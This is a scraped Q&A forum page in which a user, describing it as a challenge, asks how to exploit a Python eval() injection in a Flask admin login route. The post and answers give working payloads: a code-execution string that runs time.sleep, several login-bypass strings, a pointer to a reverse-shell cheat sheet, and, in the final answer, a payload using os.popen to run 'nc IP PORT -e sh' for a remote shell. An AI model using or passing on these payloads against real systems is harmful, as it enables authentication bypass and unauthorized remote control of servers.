DEVHIDE
Login Or Sign up

How to escape this python eval() function?

1.2k Views Asked by At

So, as part of a challenge I found the following piece of code on a template of an opensource site:

@app.route("/admin", methods=['GET', 'POST'])
def admin():
    username = getUsernameFromSecureStorage() or "admin"
    passwd = getPasswordFromSecureStorage()
    if session.get('loggedin', False):
        return render_template('admin_page.html')
    else:
        if request.method == 'POST':
            if eval("'" + request.form['pass'] + "' == passwd"):
                session['loggedin'] = True
                return redirect(request.headers['referer'], code=302)
            else:
                return render_template('admin.html', msg="Login failed")
        return render_template('admin.html', msg="Welcome to the admin page")

I know for a fact that there is a python command injection here, as I was able to execute a sleep function using the following payload in the password field:

'+eval(compile('for x in range(1):\n import time\n time.sleep(20)','a','single'))+'

But in case of trying to bypass the login or getting a reverse shell, there has been no luck yet.

Grateful for any suggestions.

python security eval reverse-shell bypass
Original Q&A
3

There are 3 best solutions below

4
noah On

Maybe take a look here. It's a pretty neat cheat sheet for Reverse Shells, and there are plenty of python examples.

I'm sure you can find anything in there!

EDIT:
I dont have a working reverse shell yet, but bypassing login should be possible with "' == '' or '" as password.

example.py:

passwd = "aa"
evil_code = "' == '' or '"
if eval("'" + evil_code + "' == passwd"):
    print("success")
else:
    print("no success")
0
Sarper Makas On

Normaly quit function is quiting your app so quit function might be helpfull.

You can try:

quit()
0
TeSteR On

Thank you so much for the help with bypassing the password field by using

' or True or '

Another way is:

1==1'or'2

Main thing is that the statement had to evaluate to always being True.

As for the reverse shell, was pretty easy, especially when I found out that there's no bash on the server So this is what was needed:

'+__import__("os").popen("nc IP PORT -e sh").read()+'

Thank you all for the help!

Related Questions in PYTHON

Related Questions in SECURITY

Related Questions in EVAL

Related Questions in REVERSE-SHELL

Related Questions in BYPASS

Trending Questions

Popular # Hahtags

javascript python java c# php android html jquery c++ css ios sql mysql r reactjs

Popular Questions

.

Copyright © 2021 Jogjafile Inc.